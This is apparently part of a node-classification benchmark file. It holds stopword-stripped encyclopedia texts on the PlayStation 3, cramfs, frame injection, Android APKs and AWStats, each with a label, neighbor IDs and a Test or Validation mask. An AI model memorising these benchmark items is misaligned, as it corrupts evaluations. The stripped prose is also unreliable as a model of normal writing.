    "text": "PlayStation_3:playstation 3 playstation 3 officially abbreviated ps3 home video game console developed sony computer entertainment successor playstation 2 part playstation brand consoles first released november 11 2006 japan november 17 2006 north america march 23 2007 europe australia playstation 3 competed mainly consoles microsoft xbox 360 nintendo wii part seventh generation video game consoles console first officially announced e3 2005 released end 2006 first console use blu-ray disc primary storage medium console first playstation integrate social gaming services including playstation network well first controllable handheld console remote connectivity playstation portable playstation vita september 2009 slim model playstation 3 released longer provided hardware ability run ps2 games lighter thinner original version featured redesigned logo marketing design well minor start-up change software super slim variation released late 2012 refining redesigning console early years system critically negative reception due high price 599 60 gigabyte model 499 20 gb model complex processor architecture lack quality games praised blu-ray capabilities untapped potential reception would get positive time system slow start market managed recover particularly introduction slim model successor playstation 4 released later november 2013 september 29 2015 sony confirmed sales playstation 3 discontinued new zealand system remained production markets shipments new units europe australia ended march 2016 followed north america ended october 2016 heading 2017 japan last territory new units still produced may 29 2017 sony confirmed playstation 3 discontinued japan playstation 3 began development 2001 ken kutaragi president sony computer entertainment announced sony toshiba ibm would collaborate developing cell microprocessor time shuhei yoshida led group programmers within hardware team explore next-generation game creation early 2005 focus within sony shifted towards developing ps3 launch titles sony officially unveiled playstation 3 public may 16 2005 e3 2005 along boomerang-shaped prototype design sixaxis controller functional version system present tokyo game show september 2005 although demonstrations held events software development kits comparable personal computer hardware video footage based predicted playstation 3 specifications also shown notably final fantasy vii tech demo initial prototype shown may 2005 featured two hdmi ports three ethernet ports six usb ports however system shown year later e3 2006 reduced one hdmi port one ethernet port four usb ports presumably cut costs two hardware configurations also announced console 20 gb model 60 gb model priced us 499 €499 us 599 €599 respectively 60 gb model configuration feature hdmi port wi-fi internet flash card readers chrome trim logo silver models announced simultaneous worldwide release november 11 2006 japan november 17 2006 north america europe september 6 2006 sony announced pal region playstation 3 launch would delayed march 2007 shortage materials used blu-ray drive tokyo game show september 22 2006 sony announced would include hdmi port 20 gb system chrome trim flash card readers silver logo wi-fi would included also launch price japanese 20 gb model reduced 20 60 gb model announced open pricing scheme japan event sony showed 27 playable ps3 games running final hardware playstation 3 first released japan november 11 2006 07:00 according media create 81,639 ps3 systems sold within 24 hours introduction japan soon release japan ps3 released north america november 17 2006 reports violence surrounded release ps3 customer shot campers robbed gunpoint customers shot drive-by shooting bb guns 60 campers fought 10 systems console originally planned global release november start september release europe rest world delayed march somewhat last-minute delay companies taken deposits pre-orders sony informed customers eligible full refunds could continue pre-order january 24 2007 sony announced playstation 3 would go sale march 23 2007 europe australia middle east africa new zealand system sold 600,000 units first two days march 7 2007 60 gb playstation 3 launched singapore price 799 console launched south korea june 16 2007 single version equipped 80 gb hard drive iptv following speculation sony working 'slim model sony officially announced ps3 cech-2000 model august 18 2009 sony gamescom press conference new features included slimmer form factor decreased power consumption quieter cooling system released major territories september 2009 time new logo introduced console replace previous spider-man wordmarks named due use font logos sony then-current spider-man films new ps3 wordmark evoking design playstation 2 wordmark replacing capitalized playstation 3 lettering september 2012 tokyo game show sony announced new slimmer ps3 redesign cech-4000 due release late 2012 would available either 250 gb 500 gb hard drive three versions super slim model revealed one 500 gb hard drive second 250 gb hard drive available pal regions third 12 gb flash storage available pal regions canada storage 12 gb model upgradable official standalone 250 gb hard drive vertical stand also released model united kingdom 500 gb model released september 28 2012 12 gb model released october 12 2012 united states ps3 super slim first released bundled console 250 gb model bundled game year edition released september 25 2012 500 gb model bundled assassin creed iii released october 30 2012 japan black colored super slim model released october 4 2012 white colored super slim model released november 22 2012 super slim model 20 percent smaller 25 percent lighter slim model features manual sliding disc cover instead motorized slot-loading disc cover slim model white colored super slim model released united states january 27 2013 part instant game collection bundle garnet red azurite blue colored models launched japan february 28 2013 garnet red version released north america march 12 2013 part bundle 500 gb storage contained god war ascension well god war saga azurite blue model released gamestop exclusive 250gb storage playstation 3 launched north america 14 titles another three released end 2006 first week sales confirmed insomniac games top-selling launch game north america game heavily praised numerous video game websites including gamespot ign awarded playstation 3 game year award 2006 titles missed launch window delayed early 2007 f.e.a.r sonic hedgehog japanese launch ridge racer 7 top-selling game also fared well sales offerings namco bandai games playstation 3 launched europe 24 titles including ones offered north american japanese launches formula one championship edition motorstorm virtua fighter 5 motorstorm successful titles 2007 games subsequently received sequels form resistance 2 e3 2007 sony able show number upcoming video games playstation 3 including heavenly sword lair warhawk released third fourth quarters 2007 also showed number titles set release 2008 2009 notably killzone 2 infamous gran turismo 5 prologue littlebigplanet number third-party exclusives also shown including highly anticipated alongside high-profile third-party titles grand theft auto iv assassin creed devil may cry 4 resident evil 5 two important titles playstation 3 final fantasy xiii final fantasy versus xiii shown tgs 2007 order appease japanese market sony since launched budget range playstation 3 titles known greatest hits range north america platinum range europe australia best range japan among titles available budget range include motorstorm call duty 3 assassin creed ninja gaiden sigma october 2009 devil may cry 4 army two also joined list 595 million games sold playstation 3 best selling ps3 games grand theft auto v gran turismo 5 last us last game released playstation 3 fifa 19 september 28 2018 december 2008 cto blitz games announced would bring stereoscopic 3d gaming movie viewing xbox 360 playstation 3 technology first demonstrated publicly ps3 using sony technology january 2009 consumer electronics show journalists shown wipeout hd gran turismo 5 prologue 3d demonstration technology might work implemented future firmware update 3.30 officially allowed ps3 titles played 3d requiring compatible display use system software update 3.50 prepared 3d films game must programmed take advantage 3d technology titles may patched add functionality retroactively titles patches include wipeout hd pain super stardust hd playstation 3 convex left side playstation logo upright vertical top side convex horizontal glossy black finish playstation designer teiyu goto stated spider-man-font-inspired logo one first elements scei president ken kutaragi decided logo may motivating force behind shape ps3 march 22 2007 sce stanford university released folding home software playstation 3 program allows ps3 owners lend computing power consoles help study process protein folding disease research ps3 hardware also used build supercomputers high-performance computing fixstars solutions sells version yellow dog linux playstation 3 originally sold terra soft solutions rapidmind produced stream programming package ps3 acquired intel 2009 also january 3 2007 dr. frank mueller associate professor computer science ncsu clustered 8 ps3s mueller commented 256 mb system ram limitation particular application considering attempting retrofit ram software includes fedora core 5 linux ppc64 mpich2 openmp v 2.5 gnu compiler collection cellsdk 1.1 cost-effective alternative conventional supercomputers u.s. military purchased clusters ps3 units research purposes retail ps3 slim units used supercomputing ps3 slim lacks ability boot third-party os december 2008 group hackers used cluster 200 playstation 3 computers crack ssl authentication november 2010 air force research laboratory afrl created powerful supercomputer connecting together 1,760 sony ps3s include 168 separate graphical processing units 84 coordinating servers parallel array capable performing 500 trillion floating-point operations per second 500 tflops built condor cluster 33rd largest supercomputer world would used analyze high definition satellite imagery playstation 3 features slot-loading 2x speed blu-ray disc drive games blu-ray movies dvds cds optical media originally available hard drives 20 60 gb 20 gb model available pal regions various sizes 500 gb made available since see model comparison ps3 models user-upgradeable 2.5 sata hard drives playstation 3 uses cell microprocessor designed sony toshiba ibm cpu made one 3.2 ghz powerpc-based power processing element ppe eight synergistic processing elements spes eighth spe disabled improve chip yields six seven spes accessible developers seventh spe reserved console operating system graphics processing handled nvidia rsx 'reality synthesizer produce resolutions 480i/576i sd 1080p hd playstation 3 256 mb xdr dram main memory 256 mb gddr3 video memory rsx system bluetooth 2.0 support seven bluetooth devices gigabit ethernet usb 2.0 hdmi 1.4 built wi-fi networking also built-in 20 gb models flash card reader compatible memory stick sd/mmc compactflash/microdrive media built-in 60 gb cechexx 80 gb models playstation 3 produced various models original slim super slim successive models added removed various features numerous accessories console developed accessories include wireless sixaxis dualshock 3 controllers logitech driving force gt logitech cordless precision controller bd remote playstation eye camera playtv dvb-t tuner/digital video recorder accessory sony e3 press conference 2006 standard wireless sixaxis controller announced controller based basic design playstation 2 dualshock 2 controller wireless lacked vibration capabilities built-in accelerometer could detect motion three directional three rotational axes six total hence name sixaxis cosmetic tweaks press conference 2007 tokyo game show sony announced dualshock 3 trademarked dualshock 3 playstation 3 controller function design sixaxis vibration capability included hands-on accounts describe controller noticeably heavier standard sixaxis controller capable vibration forces comparable dualshock 2 released japan november 11 2007 north america april 5 2008 australia april 24 2008 new zealand may 9 2008 mainland europe july 2 2008 united kingdom ireland july 4 2008 e3 2009 sony unveiled plans release motion controller later named playstation move gdc 2010 released september 15 2010 europe september 19 2010 north america october 21 2010 japan october 13 2010 sony announced official surround sound system ps3 official playstation youtube channel playstation 3 also use dualshock 4 controller initially via usb cable firmware update 4.60 enabled wireless connection according ars technica number playstation 3 consoles experienced failure well within normal failure rates consumer electronics industry 2009 study squaretrade warranty provider found two-year failure rate 10 playstation 3s september 2009 bbc watchdog television program aired report investigating issue calling yellow light death ylod among consoles experienced failure found usually occurred 18–24 months purchase standard sony warranty covers one year purchase time period playstation 3 owners pay sony fixed fee refurbished console sony claimed according statistics returned consoles approximately 0.5 consoles reported showing ylod response televised report sony issued document criticizing program accuracy conclusions specifically faults evidence manufacturing defect document also complained report inappropriate tone might damage sony brand name sony included ability operating system referred system software updated updates acquired several ways original playstation 3 also included ability install operating systems linux included newer slim models removed older playstation 3 consoles release firmware update 3.21 april 2010 functionality available users original consoles choose update system software beyond version 3.15 installed third-party modified unofficial versions firmware instead standard playstation 3 version xrossmediabar pronounced cross media bar abbreviated xmb includes nine categories options users settings photo music video tv/video services game network playstation network friends similar playstation portable media bar tv/video services category services like netflix and/or playtv torne installed first category section channels lets users download various streaming services including sony streaming services crackle playstation vue default new section playstation network displayed system starts ps3 includes ability store various master secondary user profiles manage explore photos without musical slide show play music copy audio cd tracks attached data storage device play movies video files hard disk drive optical disc blu-ray disc dvd-video optional usb mass storage flash card compatibility usb keyboard mouse web browser supporting compatible-file download function additionally upnp media appear respective audio/video/photo categories compatible media server dlna server detected local network friends menu allows mail emoticon attached picture features video chat requires optional playstation eye eyetoy webcam network menu allows online shopping playstation store connectivity playstation portable via remote play playstation 3 console protects certain types data uses digital rights management limit data use purchased games content playstation network store governed playstation network digital rights management ndrm ndrm allows users access data 2 different playstation 3 activated using user playstation network id playstation 3 also limits transfer copy protected videos downloaded store machines states copy protected video may restore correctly following certain actions making backup downloading new copy protected movie photo gallery optional application view create group photos ps3 installed separately system software 105 mb introduced system software version 2.60 provides range tools sorting displaying system pictures key feature application organize photos groups according various criteria notable categorizations colors ages facial expressions people photos slideshows viewed application along music playlists software updated release system software version 3.40 allowing users upload browse photos facebook picasa playmemories optional stereoscopic 3d also standard photo viewing application installed playstation store 956 mb application dedicated specifically 3d photos features ability zoom 3d environments change angle perspective panoramas requires system software 3.40 higher 3d photos 3d hdtv hdmi cable 3d images viewed properly new application released part system software version 3.40 allows users edit videos playstation 3 upload internet software features basic video editing tools including ability cut videos add music captions videos rendered uploaded video sharing websites facebook youtube addition video service provided sony entertainment network playstation 3 console access variety third party video services dependent region since june 2009 vidzone offered free music video streaming service europe australia new zealand october 2009 sony computer entertainment netflix announced netflix streaming service would also available playstation 3 united states paid netflix subscription required service service became available november 2009 initially users use free blu-ray disc access service however october 2010 requirement use disc gain access removed april 2010 support mlb.tv added allowing mlb.tv subscribers watch regular season games live hd access new interactive features designed exclusively psn november 2010 access video social networking site mubi enabled european new zealand australian users service integrates elements social networking rental subscription video streaming allowing users watch discuss films users also november 2010 video rental service vudu nhl gamecenter live subscription service hulu plus launched playstation 3 united states august 2011 sony partnership directv added nfl sunday ticket october 2011 best buy launched app cinemanow service april 2012 amazon.com launched amazon video app accessible amazon prime subscribers us upon reviewing playstation netflix collaboration pocket-lint said 've used netflix app xbox good think ps3 version might edge stated netflix lovefilm playstation mind-blowingly good july 2013 yupptv ott player launched branded application ps3 computer entertainment system united states playstation 3 initially shipped ability install alternative operating system alongside main system software linux unix-based operating systems available hardware allowed access six seven synergistic processing elements cell microprocessor rsx 'reality synthesizer graphics chip 'otheros functionality present updated ps slim models feature subsequently removed previous versions ps3 part machine firmware update version 3.21 released april 1 2010 sony cited security concerns rationale firmware update 3.21 mandatory access playstation network removal caused controversy update removed officially advertised features already sold products gave rise several class action lawsuits aimed making sony return feature provide compensation december 8 2011 u.s. district judge richard seeborg dismissed last remaining count class action lawsuit claims suit previously dismissed stating legal matter ... plaintiffs failed allege facts articulate theory sony may held liable u.s. court appeals ninth circuit partially reversed dismissal sent case back district court march 1 2010 utc many original fat playstation 3 models worldwide experiencing errors related internal system clock error many symptoms initially main problem seemed inability connect playstation network however root cause problem unrelated playstation network since even users never online also problems playing installed offline games queried system timer part startup using system themes time many users noted console clock gone back december 31 1999 event nicknamed apocalyps3 play word apocalypse ps3 abbreviation playstation 3 console error code displayed typically 8001050f affected users unable sign play games use dynamic themes view/sync trophies problem resided within 1st 3rd generation original ps3 units newer slim models unaffected different internal hardware clock sony confirmed error stated narrowing issue continuing work restore service march 2 utc 2010 owners original ps3 models could connect psn successfully clock longer showed december 31 1999 sony stated affected models incorrectly identified 2010 leap year bug bcd method storing date however users hardware operating system clock mainly updated internet associated internal clock needed updated manually re-syncing via internet june 29 2010 sony released ps3 system software update 3.40 improved functionality internal clock properly account leap years playstation portable connect playstation 3 many ways including in-game connectivity example formula one championship edition racing game shown e3 2006 using psp real-time rear-view mirror addition users able download original playstation format games playstation store transfer play psp well ps3 also possible use remote play feature play playstation network games remotely psp network internet connection sony also demonstrated psp playing back video content playstation 3 hard disk across ad hoc wireless network feature referred remote play located browser icon playstation 3 playstation portable remote play since expanded allow remote access ps3 via psp wireless access point world playstation network unified online multiplayer gaming digital media delivery service provided sony computer entertainment playstation 3 playstation portable announced 2006 playstation business briefing meeting tokyo service always connected free includes multiplayer support network enables online gaming playstation store playstation home services playstation network uses real currency playstation network cards seen playstation store playstation home playstation plus commonly abbreviated ps+ occasionally referred psn plus premium playstation network subscription service officially unveiled e3 2010 jack tretton president ceo scea rumors service speculation since kaz hirai announcement tgs 2009 possible paid service psn current psn service still available launched alongside ps3 firmware 3.40 psp firmware 6.30 june 29 2010 paid-for subscription service provides users enhanced services playstation network top current psn service still available features enhancements include ability demos game updates download automatically playstation 3 subscribers also get early exclusive access betas game demos premium downloadable content playstation store items north american users also get free subscription qore users may choose purchase either one-year three-month subscription playstation plus playstation store online virtual market available users sony playstation 3 ps3 playstation portable psp game consoles via playstation network store offers range downloadable content purchase available free charge available content includes full games add-on content playable demos themes game movie trailers service accessible icon xmb ps3 psp ps3 store also accessed psp via remote play connection ps3 psp store also available via pc application media go 600 million downloads playstation store worldwide playstation store updated new content tuesday north america wednesday pal regions may 2010 changed thursdays allow psp games released digitally closer time released umd new announced gamescom 2009 released september 1 2009 playstation 3 system software 3.0 feature replace existing information board displayed news playstation website associated user region concept developed major playstation network feature interacts status indicator display ticker content excluding recently played content currently north america japan system displays new screen default instead games menu video menu movie inserted starting new four sections pick recently played latest information new content available playstation store four kinds content new screen displays links sections recently played displays user recently played games online services whereas sections contain website links links play videos access selected sections playstation store playstation store icons game video section act similarly new screen except display link games videos playstation store respectively playstation home virtual 3d social networking service playstation network home allowed users create custom avatar could groomed realistically users could edit decorate personal apartments avatars club houses free premium content users could shop new items win prizes ps3 games home activities users could interact connect friends customize content virtual world home also acted meeting place users wanted play multiplayer video games others closed beta began europe may 2007 expanded territories soon home delayed expanded several times initially releasing open beta test started december 11 2008 remained perpetual beta closure march 31 2015 home available directly playstation 3 xrossmediabar membership free required psn account home featured places meet interact dedicated game spaces developer spaces company spaces events service underwent weekly maintenance frequent updates time closure march 2015 home downloaded 41 million users life playstation released september 18 2008 succeed folding home retired november 6 2012 life playstation used virtual globe data display news information city along folding home functionality application provided access three information channels first live channel offering news headlines weather provided google news weather channel university wisconsin–madison space science engineering center among sources second channel world heritage channel offered historical information historical sites third channel united village channel united village designed share information communities cultures worldwide update allowed video photo viewing application fourth channel u.s. exclusive playstation network game trailers channel direct streaming game trailers april 20 2011 sony shut playstation network qriocity prolonged interval revealing april 23 due external intrusion system sony later revealed personal information 77 million users might taken including names addresses countries email addresses birthdates psn/qriocity logins passwords handles/psn online ids. ref name= psn/qriocity service update /ref also stated possible users profile data including purchase history billing address playstation network/qriocity password security answers may obtained evidence credit card data taken possibility could ruled sony advised customers credit card data may obtained additionally credit card numbers encrypted sony never collected three digit cvc csc number back credit cards required authenticating transactions response incident sony announced welcome back program 30 days free membership playstation plus psn members two free downloadable ps3 games free one-year enrollment identity theft protection program although playstation predecessors dominant competition hugely profitable sony playstation 3 inauspicious start sony chairman ceo sir howard stringer initially could convince investors turnaround fortunes ps3 lacked unique gameplay affordable wii became generation successful console terms units sold furthermore ps3 compete directly xbox 360 market head start result platform longer exclusive titles ps2 enjoyed grand theft auto final fantasy series regarding cross-platform games xbox 360 versions generally considered superior 2006 although 2008 ps3 versions reached parity surpassed took longer expected ps3 enjoy strong sales close gap xbox 360 sony also continued lose money ps3 sold 2010 although redesigned slim ps3 cut losses since playstation 3 initial production cost estimated isuppli us 805.85 20 gb model us 840.35 60 gb model however priced us 499 us 599 respectively meaning units may sold estimated loss 306 241 depending model cost estimates correct thus may contributed sony games division posting operating loss ¥232.3 billion us 1.97 billion fiscal year ending march 2007 april 2007 soon results published ken kutaragi president sony computer entertainment announced plans retire various news agencies including times wall street journal reported due poor sales scei maintains kutaragi planning retirement six months prior announcement january 2008 kaz hirai ceo sony computer entertainment suggested console may start making profit early 2009 stating next fiscal year starts april try achieve next fiscal year would great thing profitability definite commitment would like try shoot however market analysts nikko citigroup predicted playstation 3 could profitable august 2008 july 2008 interview hirai stated objective playstation 3 sell 150 million units ninth year surpassing playstation 2 sales 140 million nine years market january 2009 sony announced gaming division profitable q3 2008 since system launch production costs reduced significantly result phasing emotion engine chip falling hardware costs cost manufacturing cell microprocessors fallen dramatically result moving 65 nm production process blu-ray disc diodes become cheaper manufacture january 2008 unit cost around 400 manufacture august 2009 sony reduced costs total 70 meaning costs sony around 240 per unit early playstation 3 reviews launch critical high price lack quality games game developers regarded architecture difficult program ps3 however commended hardware including blu-ray home theater capabilities graphics potential critical commercial reception ps3 improved time series price revisions blu-ray victory hd dvd release several well received titles ars technica original launch review gave ps3 6/10 second review console june 2008 rated 9/10 september 2009 ign named playstation 3 15th best gaming console time behind competitors wii 10th xbox 360 6th however ps3 ign console showdown —based console offers best selection games released year—in three four years since began 2008 2009 2011 xbox winning 2010 ign judged playstation 3 best game line-up 2008 based review scores comparison wii xbox 360 comparison piece pc magazine greenwald june 2012 ps3 selected overall better console compared xbox 360 pocket-lint said console ps3 always brilliant games console best media device money ps3 given number-eight spot pc world magazine list top 21 tech screwups 2006 criticized late expensive incompatible gamesradar ranked ps3 top item feature game-related pr disasters asking sony managed take one anticipated game systems time — within space year — turn hate object reviled entire internet added despite problems system untapped potential business week summed general opinion stating impressed playstation 3 could currently developers also found machine difficult program 2007 gabe newell valve said ps3 total disaster many levels think really clear sony lost track customers developers wanted continued 'd say even late date cancel say 'this horrible disaster 're sorry 're going stop selling stop trying convince people develop doug lombardi vp marketing valve since stated valve interested developing console looking hire talented ps3 programmers future projects later restated valve position ability get ps3 team together find people want come valve valve want work n't really see us moving platform sony e3 2010 press conference newell made live appearance recant previous statements citing sony move make system developer friendly announce valve would developing portal 2 system also claimed inclusion steamworks valve system automatically update software independently would help make ps3 version portal 2 best console version market activision blizzard ceo bobby kotick criticized ps3 high development costs inferior attach rate return xbox 360 wii believes factors pushing developers away working console interview times kotick stated 'm getting concerned sony playstation 3 losing bit momentum n't make easy support platform continued expensive develop console wii xbox selling better games generate better return invested capital roic xbox playstation kotick also claimed activision blizzard may stop supporting system situation addressed sony cut ps3 retail price n't attach rates likely slow realistic might stop supporting sony kotick received heavy criticism statement notably developer bioware questioned wisdom threatened move referred statement silly despite initial negative press several websites given system good reviews mostly regarding hardware cnet united kingdom praised system saying ps3 versatile impressive piece home-entertainment equipment lives hype ... ps3 well worth hefty price tag cnet awarded score 8.8 10 voted number one must-have gadget praising robust graphical capabilities stylish exterior design criticizing limited selection available games addition home theater magazine ultimate av given system blu-ray playback favorable reviews stating quality playback exceeds many current standalone blu-ray disc players interview kazuo hirai chairman sony computer entertainment argued choice complex architecture hexus gaming reviewed pal version summed review saying playstation 3 matures developers start really pushing 'll see playstation 3 emerge console choice gaming gdc 2007 shiny entertainment founder dave perry stated think sony made best machine best piece hardware without question playstation 3 slim received extremely positive reviews well boost sales less 24 hours announcement ps3 slim took number-one bestseller spot amazon.com video games section fifteen consecutive days regained number-one position one day later ps3 slim also received praise pc world giving 90 100 praising new repackaging new value brings lower price well praising quietness reduction power consumption stark contrast original ps3 launch given position number-eight top 21 tech screwups 2006 list cnet awarded ps3 slim four five stars praising blu-ray capabilities 120 gb hard drive free online gaming service affordable pricing point complained lack backward compatibility playstation 2 games techradar gave ps3 slim four half stars five praising new smaller size summed review stating ps3 slim phenomenal piece kit amazing something small much however criticized exterior design build quality relation original model eurogamer called product cost-cutting – large – tastefully done said nothing short massive win sony super slim model ps3 received positive reviews gaming website spong praised new super slim quietness stating noticeable noise comes drive seeks new area disc starting load game occurs infrequently added fans quieter slim went praise new smaller lighter size criticism placed new disc loader stating cover moved hand wish also eject button work software eject triangle button menus xross media bar xmb interface addition close cover hand bit fiddly upright ps3 wo n't start reading disc unless close cover also said real drop retail price tech media website cnet gave new super slim 4 5 stars excellent saying super slim playstation 3 shrinks powerful gaming machine even tinier package maintaining features predecessors great gaming library strong array streaming services ... whilst also criticising cheap design disc-loader stating sometimes cover n't catch feel like 're using one old credit card imprinter machines short feels cheap n't realize convenient autoloading disc trays 're gone whether cut costs save space move ultimately step back criticism also due price stating cheapest super slim model still expensive cheapest slim model smaller size bigger hard drive n't considered upgrade hard drive slim model easily removed replaced praise hard drive super slim model easiest yet simply sliding side panel reveals drive bay quickly unscrewed also stated whilst super slim model way upgrade could indicator come may revolutionary super slim ps3 impressive machine much smaller package n't seem reason existing ps3 owners upgrade prospective ps3 buyer super slim probably way go deal slot-loading disc drive pocket-lint gave super slim positive review saying much affordable brilliant gaming second-to-none video media player think blinding good console one serve years come second-hand games even new releases without doubt n't ps3 time buy gave super slim 4 half stars 5 technology magazine t3 gave super slim model positive review stating console almost nostalgic design similarities original fat model n't know whether play ps3 games blu-ray discs differently yet look feel new ps3 slim obvious homage original ps3 minus considerable excess weight immediately would concerned durability top loading tray feels like could yanked straight console ultimately feels like sony nostalgic way signing current generation console anticipation ps4 official websites auxiliary sites sony directories",
    "neighbors": [
      3585,
      4098,
      10241,
      3077,
      10761,
      7183,
      4112,
      4120,
      10780,
      9247,
      11306,
      1067,
      9774,
      10287,
      2096,
      1587,
      57,
      1599,
      10817,
      1091,
      8266,
      2635,
      6732,
      10316,
      6738,
      1619,
      607,
      95,
      5736,
      5746,
      7283,
      4724,
      7801,
      10874,
      1148,
      6781,
      8316,
      10368,
      643,
      3203,
      11398,
      1674,
      3210,
      6799,
      1683,
      5269,
      1181,
      5793,
      162,
      8355,
      6311,
      684,
      9391,
      4786,
      6835,
      8899,
      708,
      3793,
      8917,
      4311,
      4312,
      6873,
      4317,
      2277,
      9445,
      3307,
      7916,
      1776,
      3824,
      6900,
      2293,
      8438,
      10999,
      1784,
      3323,
      6909,
      9472,
      1801,
      2826,
      9489,
      11027,
      1813,
      5914,
      801,
      8484,
      9508,
      9512,
      9518,
      7983,
      8496,
      306,
      823,
      2368,
      833,
      2885,
      3911,
      9543,
      10056,
      7502,
      10576,
      3923,
      342,
      859,
      10076,
      359,
      9070,
      11630,
      5492,
      6004,
      7028,
      7029,
      2937,
      9091,
      9605,
      8071,
      400,
      11666,
      915,
      921,
      4516,
      7086,
      10675,
      1974,
      6072,
      8120,
      1985,
      7111,
      456,
      1480,
      3025,
      986,
      4060,
      1501,
      2525,
      998,
      9703,
      11238,
      4587,
      5612,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 8938,
    "label": 6,
    "text": "Cramfs:cramfs compressed rom file system cramfs free gpl'ed read-only linux file system designed simplicity space-efficiency mainly used embedded small-footprint systems unlike compressed image conventional file system cramfs image used i.e without first decompressing reason linux distributions use cramfs initrd images debian 3.1 particular installation images suse linux particular constraints memory image size 2013 linux maintainers indicated cramfs made obsolete squashfs file system got rehabilitated 2017 use low-memory devices using squashfs may viable files cramfs file systems zlib-compressed one page time allow random read access metadata compressed expressed terse representation space-efficient conventional file systems file system intentionally read-only simplify design random write access compressed files difficult implement cramfs ships utility codice_1 pack files new cramfs images file sizes limited less 16mb maximum file system size little 272mb last file file system must begin 256mb block extend past",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      5824,
      3265,
      10951,
      9420,
      3791,
      7378,
      3795,
      4819,
      8402,
      8404,
      10967,
      728,
      8410,
      6365,
      739,
      7907,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8115,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      8676,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 8939,
    "label": 4,
    "text": "Frame_injection:frame injection frame injection attack attack internet explorer 5 internet explorer 6 internet explorer 7 load arbitrary code browser attack caused internet explorer checking destination resulting frame therefore allowing arbitrary code javascript vbscript also happens code gets injected frames due scripts validating input type frame injection affects browsers scripts validate untrusted input",
    "neighbors": [
      11683,
      3462,
      6028,
      8281,
      3643
    ],
    "mask": "None"
  },
  {
    "node_id": 8940,
    "label": 2,
    "text": "Android_application_package:android application package android package apk package file format used android operating system distribution installation mobile apps middleware apk analogous software packages appx microsoft windows debian package debian-based operating systems make apk file program android first compiled parts packaged one container file apk file contains program code .dex files resources assets certificates manifest file case many file formats apk files name needed provided file name ends file extension .apk apk files used downgrade apps older file version i.e downgrade app version 78.9 55.1 uninstalling upgraded app installing older version via unknown sources setting settings see information done various reasons upgrade causing app repeatedly freeze and/or crash upgrade changing app drastically e.g background dark bright preferred features present changed hidden restoring/removing something upgrade removed installed apk file also solution installing apps/games limited restricted countries apk files type archive file specifically zip format-type packages based jar file format codice_1 filename extension mime type associated apk files codice_2 apk files installed android-powered devices like installing software pc user downloads android application using android device official source google play store automatically installed apk files also downloaded google play store without installation using non-android device either chrome firefox extension directly unofficial sites several android apps used process moving apk files different devices known also called apk sideloading apps include android file manager apps app orientation apps ... installation apk files outside google play disabled default users install unknown apk files enabling unknown sources accounts security settings user developer also install apk file directly device via download network desktop computer using communication program adb apk file archive usually contains following files directories",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      3114,
      5677,
      2095,
      1083,
      10817,
      7234,
      6212,
      69,
      8262,
      3659,
      4685,
      4174,
      10317,
      3664,
      8280,
      8285,
      97,
      2658,
      10857,
      11391,
      1670,
      6797,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      196,
      8907,
      722,
      3804,
      8413,
      9949,
      1255,
      9964,
      237,
      5892,
      7428,
      2828,
      280,
      3865,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      3380,
      4406,
      5431,
      2875,
      3900,
      10045,
      11076,
      11082,
      332,
      3409,
      3921,
      8019,
      2901,
      5467,
      3940,
      7548,
      4994,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      1970,
      4024,
      8122,
      5067,
      2001,
      4561,
      479,
      5096,
      1516,
      5100,
      5613,
      499,
      5620,
      11252,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8941,
    "label": 8,
    "text": "AWStats:awstats awstats open source web analytics reporting tool suitable analyzing data internet services web streaming media mail ftp servers awstats parses analyzes server log files producing html reports data visually presented within reports tables bar graphs static reports created command line interface on-demand reporting supported web browser cgi program awstats supports major web server log file formats including apache ncsa combined/xlf/elf log format common log format clf webstar iis w3c log format many common web server log formats development moved sourceforge github 2014 written perl awstats deployed almost operating system server administration tool packages available linux distributions awstats installed workstation microsoft windows local use situations log files downloaded remote server awstats licensed gnu general public license gpl proper web log analysis tool configuration report interpretation requires bit technical business knowledge awstats support resources include documentation user community forums on-demand cgi program object security exploits case many cgi programs organizations wishing provide public access web analytics reports consider generating static html reports on-demand facility still used restricting use internal users precautions taken referrer spam referrer spam filtering functionality added version 6.5",
    "neighbors": [
      5249,
      5253,
      6533,
      8582,
      6797,
      3988,
      1943,
      10270,
      7967,
      10276,
      6313,
      1837,
      4398,
      7983,
      6576,
      2485,
      9014,
      11201,
      7364,
      4294,
      3401,
      7764,
      11221,
      4439,
      11610,
      7518,
      225,
      865,
      11492,
      2281,
      5612,
      124,
      3837
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8942,
    "label": 3,
